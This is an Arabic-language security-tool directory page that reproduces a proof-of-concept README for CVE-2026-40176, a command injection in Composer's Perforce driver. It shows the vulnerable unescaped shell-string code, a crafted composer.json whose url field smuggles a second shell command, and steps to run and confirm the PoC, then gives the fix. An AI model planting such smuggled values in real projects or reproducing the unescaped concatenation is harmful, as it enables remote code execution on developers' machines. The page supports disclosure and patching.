Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-40176-poc — استغلال إثبات المفهوم لـ CVE-2026-40176، وهو حقن أوامر نظام التشغيل في برنامج تشغيل Perforce VCS الخاص بـ Composer مما يتيح تنفيذ تعليمات برمجية عن بُعد عبر ملف composer.json مُعدّل. | Kitploit
أدوات/GitHubGitHub/saku0512/cve-2026-40176-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالقيادة والسيطرةالتعلم والتعليمتطوير الحمولات
GitHubsaku0512/cve-2026-40176-poc

CVE-2026-40176-poc

استغلال إثبات المفهوم لـ CVE-2026-40176، وهو حقن أوامر نظام التشغيل في برنامج تشغيل Perforce VCS الخاص بـ Composer مما يتيح تنفيذ تعليمات برمجية عن بُعد عبر ملف composer.json مُعدّل.

عرض المستودع
2منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-40176: إثبات المفهوم (PoC) لحقن أوامر نظام التشغيل في Composer Perforce

English version

ملخص

هذا المستودع هو إثبات المفهوم (PoC) للثغرة الأمنية الحرجة CVE-2026-40176 الخاصة بحقن أوامر نظام التشغيل (OS Command Injection) الموجودة في مشغل VCS من نوع Perforce في Composer. تؤثر هذه الثغرة على إصدارات Composer الأقدم من 2.2.27 و 2.9.6.

توجد الثغرة في طريقة Perforce::generateP4Command(). عند تجميع أوامر الصدفة، لا يتم تنظيف قيم إعدادات المستودع مثل url و p4user و client بشكل كافٍ، مما قد يسمح للمهاجم باستخدام composer.json مُتحكم به لتنفيذ أوامر عشوائية عند قيام الضحية بتشغيل composer install أو composer update.

المكتشف: saku0512 (GitHub)

إخلاء مسؤولية

هذا المشروع مخصص للأغراض التعليمية والتحقق الأمني الأخلاقي المصرح به فقط.

لا يتحمل المؤلف أي مسؤولية عن سوء استخدام هذه الأداة أو الأضرار أو الأنشطة غير القانونية الناتجة عنها. يُعد الوصول غير المصرح به إلى أنظمة الحاسوب عملاً غير قانوني. باستخدام هذا البرنامج، فإنك توافق على إجراء التحقق الأمني فقط في بيئات حصلت فيها على إذن صريح.

تفاصيل الثغرة

  • معرف CVE: CVE-2026-40176
  • النوع: حقن أوامر نظام التشغيل (CWE-78)
  • التأثير: تنفيذ تعليمات برمجية عن بُعد (RCE)
  • الإصدارات المتأثرة:
    • Composer 2.0.0 <= v2.2.26
    • Composer 2.3.0 <= v2.9.5
  • الإصدارات المُصلحة: v2.2.27 / v2.9.6

السبب الجذري

في طريقة generateP4Command() الموجودة في src/Composer/Util/Perforce.php، يتم بناء أوامر الصدفة عن طريق ربط السلاسل النصية المأخوذة من إعدادات المستودع بشكل مباشر.

root@kitploit:~
$p4Command = $this->getP4Executable().' ';
$p4Command .= '-u ' . $this->getUser() . ' ';   // غير مُهرب
if ($useClient) {
    $p4Command .= '-c ' . $this->getClient() . ' '; // غير مُهرب
}
$p4Command .= '-p ' . $this->getPort() . ' ' . $command; // غير مُهرب

إذا احتوت هذه القيم على أحرف وصفية للصدفة مثل ; و & و |، فسيتم تفسيرها بواسطة الصدفة، مما يؤدي إلى حقن الأوامر.

كيفية استخدام إثبات المفهوم

1. تحضير البيئة

تأكد من تثبيت PHP. يقوم إثبات المفهوم هذا بمحاكاة المنطق الضعيف داخل Composer.

root@kitploit:~
# التحقق من إصدار PHP
php -v

2. مثال على الإعداد (composer.json خبيث)

يمكن للمهاجم إنشاء composer.json على النحو التالي:

root@kitploit:~
{
    "repositories": [
        {
            "type": "perforce",
            "url": "localhost:1666; touch /tmp/pwned_rce_confirmed #",
            "depot": "depot"
        }
    ],
    "require": {
        "some/package": "dev-master"
    }
}

3. تشغيل إثبات المفهوم

يقوم الملف المرفق poc.php بمحاكاة منطق توليد الأوامر وتنفيذها الداخلي في إصدار Composer الضعيف.

root@kitploit:~
# تشغيل إثبات المفهوم
php poc.php

4. التحقق

تحقق من وجود الملف الذي أنشأه الحمولة لتأكيد تنفيذ الأمر.

root@kitploit:~
ls -l /tmp/pwned_rce_confirmed

في حالة وجود الملف، فهذا يؤكد نجاح تنفيذ الأوامر عن بُعد (RCE).

الإجراءات الوقائية

قم بتحديث Composer فوراً إلى أحدث إصدار.

root@kitploit:~
composer self-update

في الإصلاح، يتم تطبيق ProcessExecutor::escape() على جميع الوسائط المستمدة من إدخال المستخدم لمنع تفسير الصدفة لها.

معلومات مرجعية

  • CVE-2026-40176 (cve.org)
  • Composer Security Advisory
تنزيل الأداة